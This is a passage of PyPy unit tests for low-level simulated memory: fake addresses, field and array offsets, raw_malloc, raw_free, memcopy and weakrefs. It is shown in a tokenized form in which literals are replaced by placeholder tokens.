. s . x == <NUM_LIT> <EOL> def test_array ( ) : <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( lltype . Signed ) * <NUM_LIT:2> <EOL> b += ItemOffset ( lltype . Signed ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert x [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> def test_array_endaddress ( ) : <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( lltype . Signed ) * <NUM_LIT:5> <EOL> assert b == a + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Signed ) * <NUM_LIT:5> <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> b -= ItemOffset ( lltype . Signed ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> def test_structarray_endaddress ( ) : <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:foo>' , lltype . Signed ) ) <EOL> A = lltype . GcArray ( S ) <EOL> x = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> x [ <NUM_LIT:4> ] . foo = <NUM_LIT> <EOL> a = fakeaddress ( x ) <EOL> b = a + ArrayItemsOffset ( A ) <EOL> b += ItemOffset ( S ) * <NUM_LIT:5> <EOL> assert b == a + ArrayItemsOffset ( A ) + ItemOffset ( S ) * <NUM_LIT:5> <EOL> p = cast_adr_to_ptr ( b , lltype . Ptr ( S ) ) <EOL> py . test . raises ( AttributeError , "<STR_LIT>" ) <EOL> py . test . raises ( AttributeError , "<STR_LIT>" ) <EOL> b -= ItemOffset ( S ) <EOL> p = cast_adr_to_ptr ( b , lltype . Ptr ( S ) ) <EOL> assert p . foo == <NUM_LIT> <EOL> def test_dont_mix_offsets_and_ints ( ) : <EOL> o = AddressOffset ( ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_sizeof ( ) : <EOL> array = lltype . Array ( lltype . Signed ) <EOL> struct = lltype . Struct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> varstruct = lltype . Struct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , array ) ) <EOL> sizeof ( struct ) <EOL> sizeof ( lltype . Signed ) <EOL> py . test . raises ( AssertionError , "<STR_LIT>" ) <EOL> py . test . raises ( AssertionError , "<STR_LIT>" ) <EOL> sizeof ( array , <NUM_LIT:1> ) <EOL> sizeof ( varstruct , <NUM_LIT:2> ) <EOL> def test_confusion_with_fixedarray_item_0 ( ) : <EOL> A = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:5> ) <EOL> B = lltype . FixedSizeArray ( A , <NUM_LIT:3> ) <EOL> myoffset = itemoffsetof ( A , <NUM_LIT:4> ) <EOL> global_b = lltype . malloc ( B , immortal = True ) <EOL> global_b [ <NUM_LIT:0> ] [ <NUM_LIT:4> ] = <NUM_LIT:1000> <EOL> global_b [ <NUM_LIT:1> ] [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> global_b [ <NUM_LIT:2> ] [ <NUM_LIT:4> ] = <NUM_LIT> <EOL> def f ( n ) : <EOL> a = global_b [ n ] <EOL> adr_a = cast_ptr_to_adr ( a ) <EOL> return ( adr_a + myoffset ) . signed [ <NUM_LIT:0> ] <EOL> assert f ( <NUM_LIT:2> ) == <NUM_LIT> <EOL> assert f ( <NUM_LIT:1> ) == <NUM_LIT> <EOL> assert f ( <NUM_LIT:0> ) == <NUM_LIT:1000> <EOL> res = interpret ( f , [ <NUM_LIT:0> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> def test_structarray_add ( ) : <EOL> S = lltype . Struct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) ) <EOL> for a in [ lltype . malloc ( lltype . GcArray ( S ) , <NUM_LIT:5> ) , <EOL> lltype . malloc ( lltype . FixedSizeArray ( S , <NUM_LIT:5> ) , immortal = True ) ] : <EOL> a [ <NUM_LIT:3> ] . x = <NUM_LIT> <EOL> adr_s = cast_ptr_to_adr ( a ) <EOL> adr_s += itemoffsetof ( lltype . typeOf ( a ) . TO , <NUM_LIT:0> ) <EOL> adr_s += sizeof ( S ) * <NUM_LIT:3> <EOL> s = cast_adr_to_ptr ( adr_s , lltype . Ptr ( S ) ) <EOL> assert s . x == <NUM_LIT> <EOL> def test_fakeaddress_equality ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> s1 = lltype . malloc ( S ) <EOL> s1 . x = <NUM_LIT:1> <EOL> s2 = lltype . malloc ( S ) <EOL> s2 . x = <NUM_LIT:1> <EOL> t = lltype . malloc ( T ) <EOL> t . y = <NUM_LIT:1> <EOL> a1s1 , a2s1 , as2 , at = map ( cast_ptr_to_adr , [ s1 , s1 , s2 , t ] ) <EOL> assert a1s1 == a2s1 <EOL> assert a1s1 != as2 <EOL> assert a1s1 != at <EOL> assert as2 != at <EOL> def test_more_fakeaddress_equality ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> t = lltype . malloc ( T ) <EOL> t . s . x = <NUM_LIT:1> <EOL> s = lltype . cast_pointer ( lltype . Ptr ( S ) , t ) <EOL> a_t , a_s = map ( cast_ptr_to_adr , [ s , t ] ) <EOL> assert a_t == a_s <EOL> def test_fakeaccessor ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( s ) <EOL> adr += FieldOffset ( S , "<STR_LIT:y>" ) <EOL> assert adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . y == <NUM_LIT> <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> a [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a ) <EOL> assert ( adr + ArrayLengthOffset ( A ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> assert ( adr + ArrayItemsOffset ( A ) ) . signed [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> ( adr + ArrayItemsOffset ( A ) ) . signed [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> assert a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> adr1000 = ( adr + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Signed , <NUM_LIT:1000> ) ) <EOL> assert adr1000 . signed [ - <NUM_LIT> ] == <NUM_LIT> <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> a [ <NUM_LIT:3> ] = '<STR_LIT:*>' <EOL> adr = cast_ptr_to_adr ( a ) <EOL> assert ( adr + ArrayLengthOffset ( A ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> assert ( adr + ArrayItemsOffset ( A ) ) . char [ <NUM_LIT:3> ] == '<STR_LIT:*>' <EOL> ( adr + ArrayItemsOffset ( A ) ) . char [ <NUM_LIT:3> ] = '<STR_LIT:+>' <EOL> assert a [ <NUM_LIT:3> ] == '<STR_LIT:+>' <EOL> adr1000 = ( adr + ArrayItemsOffset ( A ) + ItemOffset ( lltype . Char , <NUM_LIT:1000> ) ) <EOL> assert adr1000 . char [ - <NUM_LIT> ] == '<STR_LIT:+>' <EOL> T = lltype . FixedSizeArray ( lltype . Char , <NUM_LIT:10> ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:z>' , lltype . Ptr ( T ) ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . z = lltype . malloc ( T , immortal = True ) <EOL> adr = cast_ptr_to_adr ( s ) <EOL> assert ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] == cast_ptr_to_adr ( s . z ) <EOL> ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] = NULL <EOL> assert s . z == lltype . nullptr ( T ) <EOL> t = lltype . malloc ( T , immortal = True ) <EOL> ( adr + offsetof ( S , '<STR_LIT:z>' ) ) . address [ <NUM_LIT:0> ] = cast_ptr_to_adr ( t ) <EOL> assert s . z == t <EOL> def test_fakeadr_eq ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> assert cast_ptr_to_adr ( s ) == cast_ptr_to_adr ( s ) <EOL> adr1 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:x>" ) <EOL> adr2 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:y>" ) <EOL> adr3 = cast_ptr_to_adr ( s ) + FieldOffset ( S , "<STR_LIT:y>" ) <EOL> assert adr1 != adr2 <EOL> assert adr2 == adr3 <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = lltype . malloc ( A , <NUM_LIT:5> ) <EOL> adr1 = cast_ptr_to_adr ( a ) + ArrayLengthOffset ( A ) <EOL> adr2 = cast_ptr_to_adr ( a ) + ArrayLengthOffset ( A ) <EOL> assert adr1 == adr2 <EOL> adr1 = cast_ptr_to_adr ( a ) + ArrayItemsOffset ( A ) <EOL> adr2 = cast_ptr_to_adr ( a ) + ArrayItemsOffset ( A ) <EOL> assert adr1 == adr2 <EOL> adr2 += ItemOffset ( lltype . Char , <NUM_LIT:0> ) <EOL> assert adr1 == adr2 <EOL> adr1 += ItemOffset ( lltype . Char , <NUM_LIT:2> ) <EOL> adr2 += ItemOffset ( lltype . Char , <NUM_LIT:3> ) <EOL> assert adr1 != adr2 <EOL> adr2 += ItemOffset ( lltype . Char , - <NUM_LIT:1> ) <EOL> assert adr1 == adr2 <EOL> def test_adr_sub ( ) : <EOL> assert NULL - NULL == <NUM_LIT:0> <EOL> A = lltype . GcArray ( lltype . Char ) <EOL> a = raw_malloc ( sizeof ( A , <NUM_LIT:5> ) ) <EOL> assert a - a == <NUM_LIT:0> <EOL> def test_cast_subarray_pointer ( ) : <EOL> for a in [ lltype . malloc ( lltype . GcArray ( lltype . Signed ) , <NUM_LIT:5> ) , <EOL> lltype . malloc ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:5> ) , <EOL> immortal = True ) ] : <EOL> A = lltype . typeOf ( a ) . TO <EOL> SUBARRAY = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) <EOL> a [ <NUM_LIT:3> ] = <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a ) + itemoffsetof ( A , <NUM_LIT:3> ) <EOL> subarray = cast_adr_to_ptr ( adr , lltype . Ptr ( SUBARRAY ) ) <EOL> assert subarray [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> subarray [ <NUM_LIT:0> ] += <NUM_LIT:2> <EOL> assert a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> def test_cast_structfield_pointer ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> SUBARRAY = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) <EOL> adr = cast_ptr_to_adr ( s ) + offsetof ( S , '<STR_LIT:y>' ) <EOL> subarray = cast_adr_to_ptr ( adr , lltype . Ptr ( SUBARRAY ) ) <EOL> subarray [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . y == <NUM_LIT> <EOL> def test_opaque ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> O = lltype . GcOpaqueType ( '<STR_LIT:O>' ) <EOL> s = lltype . malloc ( S ) <EOL> adr = cast_ptr_to_adr ( s ) <EOL> o = cast_adr_to_ptr ( adr , lltype . Ptr ( O ) ) <EOL> assert lltype . cast_opaque_ptr ( lltype . Ptr ( S ) , o ) == s <EOL> adr2 = cast_ptr_to_adr ( o ) <EOL> s2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( S ) ) <EOL> assert s2 == s <EOL> def test_raw_malloc_struct ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:z>' , lltype . Signed ) ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Ptr ( T ) ) ) <EOL> adr = raw_malloc ( sizeof ( S ) ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> raw_memclear ( adr , sizeof ( S ) ) <EOL> assert s . x == <NUM_LIT:0> <EOL> assert lltype . typeOf ( s ) == lltype . Ptr ( S ) <EOL> s . x = <NUM_LIT> <EOL> x_adr = adr + offsetof ( S , '<STR_LIT:x>' ) <EOL> assert x_adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> x_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_llinterp_raw_malloc_struct ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:z>' , lltype . Signed ) ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Ptr ( T ) ) ) <EOL> size = sizeof ( S ) <EOL> def test_read_uninit ( ) : <EOL> adr = raw_malloc ( size ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> return s . x <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> def test_read_init ( ) : <EOL> adr = raw_malloc ( size ) <EOL> raw_memclear ( adr , size ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> return s . x <EOL> res = interpret ( test_read_init , [ ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_raw_malloc_signed ( ) : <EOL> adr = raw_malloc ( sizeof ( lltype . Signed ) ) <EOL> p = cast_adr_to_ptr ( adr , <EOL> lltype . Ptr ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) ) ) <EOL> p [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert p [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_access ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( "<STR_LIT:T>" , ( '<STR_LIT:y>' , lltype . Signed ) , ( '<STR_LIT:s>' , lltype . Ptr ( S ) ) ) <EOL> p_t = lltype . malloc ( T ) <EOL> assert p_t . s == lltype . nullptr ( S ) <EOL> p_raw_t = lltype . malloc ( T , flavor = "<STR_LIT>" ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> p_raw_t = cast_adr_to_ptr ( raw_malloc ( sizeof ( T ) ) , lltype . Ptr ( T ) ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> def test_raw_malloc_signed_bunch ( ) : <EOL> adr = raw_malloc ( sizeof ( lltype . Signed ) * <NUM_LIT:50> ) <EOL> p = cast_adr_to_ptr ( adr , <EOL> lltype . Ptr ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) ) ) <EOL> for i in range ( <NUM_LIT:50> ) : <EOL> p [ i ] = <NUM_LIT> + i <EOL> assert adr . signed [ i ] == <NUM_LIT> + i <EOL> adr . signed [ i ] = <NUM_LIT> - i <EOL> assert p [ i ] == <NUM_LIT> - i <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_array ( ) : <EOL> A = lltype . Array ( lltype . Signed ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:50> ) ) <EOL> length_adr = adr + ArrayLengthOffset ( A ) <EOL> length_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT:50> <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> assert len ( p ) == <NUM_LIT:50> <EOL> for i in range ( <NUM_LIT:50> ) : <EOL> item_adr = adr + itemoffsetof ( A , i ) <EOL> p [ i ] = <NUM_LIT> + i <EOL> assert item_adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> + i <EOL> item_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> - i <EOL> assert p [ i ] == <NUM_LIT> - i <EOL> item_adr = adr + itemoffsetof ( A , <NUM_LIT:50> ) <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_gcstruct ( ) : <EOL> from pypy . rpython . memory import gcheader <EOL> HDR = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:a>' , lltype . Signed ) ) <EOL> builder = gcheader . GCHeaderBuilder ( HDR ) <EOL> gchdr = builder . size_gc_header <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> def allocate ( ) : <EOL> adr = raw_malloc ( gchdr + sizeof ( S ) ) <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( HDR ) ) <EOL> p . a = - <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( p ) <EOL> sadr = adr + gchdr <EOL> s = cast_adr_to_ptr ( sadr , lltype . Ptr ( S ) ) <EOL> s . x = <NUM_LIT> <EOL> assert ( sadr + offsetof ( S , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> ( sadr + offsetof ( S , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> return s <EOL> s = allocate ( ) <EOL> adr = cast_ptr_to_adr ( s ) - gchdr <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( HDR ) ) <EOL> assert p . a == - <NUM_LIT> <EOL> def test_raw_malloc_varsize ( ) : <EOL> A = lltype . Array ( lltype . Signed ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , A ) ) <EOL> adr = raw_malloc ( offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:10> ) ) <EOL> length_adr = adr + offsetof ( S , '<STR_LIT:y>' ) + ArrayLengthOffset ( A ) <EOL> length_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT:10> <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p . y [ <NUM_LIT:7> ] = <NUM_LIT:5> <EOL> assert ( adr + offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:7> ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> ( adr + offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:7> ) ) . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert p . y [ <NUM_LIT:7> ] == <NUM_LIT> <EOL> py . test . raises ( IndexError , <EOL> "<STR_LIT>" ) <EOL> def test_raw_free ( ) : <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:10> ) ) <EOL> p_a = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> p_a [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_a ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> adr = raw_malloc ( sizeof ( S ) ) <EOL> p_s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> adr = raw_malloc ( sizeof ( T ) ) <EOL> p_s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> U = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:u>' , U ) ) <EOL> adr = raw_malloc ( sizeof ( T ) ) <EOL> p_t = cast_adr_to_ptr ( adr , lltype . Ptr ( T ) ) <EOL> p_u = p_t . u <EOL> p_u . y = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_u ) <EOL> def test_raw_free_with_hdr ( ) : <EOL> from pypy . rpython . memory . gcheader import GCHeaderBuilder <EOL> HDR = lltype . Struct ( '<STR_LIT:h>' , ( '<STR_LIT:t>' , lltype . Signed ) ) <EOL> gh = GCHeaderBuilder ( HDR ) . size_gc_header <EOL> A = lltype . GcArray ( lltype . Signed ) <EOL> adr = raw_malloc ( gh + sizeof ( A , <NUM_LIT:10> ) ) <EOL> p_a = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( A ) ) <EOL> p_a [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_a ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_a ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> adr = raw_malloc ( gh + sizeof ( S ) ) <EOL> p_s = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_s ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> adr = raw_malloc ( gh + sizeof ( T ) ) <EOL> p_s = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_s ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> U = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:u>' , U ) ) <EOL> adr = raw_malloc ( gh + sizeof ( T ) ) <EOL> p_t = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( T ) ) <EOL> p_u = p_t . u <EOL> p_u . y = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_t ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_u ) <EOL> def test_raw_memcopy ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = cast_ptr_to_adr ( t1 ) <EOL> at2 = cast_ptr_to_adr ( t2 ) <EOL> raw_memcopy ( at1 , at2 , sizeof ( T ) ) <EOL> assert t2 . x == <NUM_LIT:1> <EOL> def test_raw_memmove ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = cast_ptr_to_adr ( t1 ) <EOL> at2 = cast_ptr_to_adr ( t2 ) <EOL> raw_memmove ( at1 , at2 , sizeof ( T ) ) <EOL> assert t2 . x == <NUM_LIT:1> <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> def test_raw_memcopy_nonrec ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> A = lltype . FixedSizeArray ( lltype . Ptr ( T ) , <NUM_LIT:1> ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = raw_malloc ( sizeof ( A ) ) <EOL> at2 = raw_malloc ( sizeof ( A ) ) <EOL> p1 = cast_adr_to_ptr ( at1 , lltype . Ptr ( A ) ) <EOL> p2 = cast_adr_to_ptr ( at2 , lltype . Ptr ( A ) ) <EOL> p1 [ <NUM_LIT:0> ] = t1 <EOL> p2 [ <NUM_LIT:0> ] = t2 <EOL> raw_memcopy ( at1 , at2 , sizeof ( A ) ) <EOL> assert p1 [ <NUM_LIT:0> ] == t1 <EOL> assert p2 [ <NUM_LIT:0> ] == t1 <EOL> assert t1 . x == <NUM_LIT:1> <EOL> assert t2 . x == <NUM_LIT:2> <EOL> def test_inlined_substruct ( ) : <EOL> T = lltype . Struct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT>' , T ) , ( '<STR_LIT>' , T ) ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT>' , S1 ) , ( '<STR_LIT:t>' , T ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . header . t1 . x = <NUM_LIT:1> <EOL> s . header . t2 . x = <NUM_LIT:2> <EOL> s . t . x = <NUM_LIT:3> <EOL> for adr in [ cast_ptr_to_adr ( s ) , cast_ptr_to_adr ( s . header ) ] : <EOL> assert ( adr + offsetof ( S , '<STR_LIT>' ) <EOL> + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> assert ( adr + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> assert ( adr + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> assert ( adr + offsetof ( S , '<STR_LIT:t>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> def test_weakref ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT>' , S1 ) ) <EOL> s = lltype . malloc ( S ) <EOL> s1 = lltype . cast_pointer ( lltype . Ptr ( S1 ) , s ) <EOL> w = weakref_create ( s ) <EOL> assert weakref_deref ( lltype . 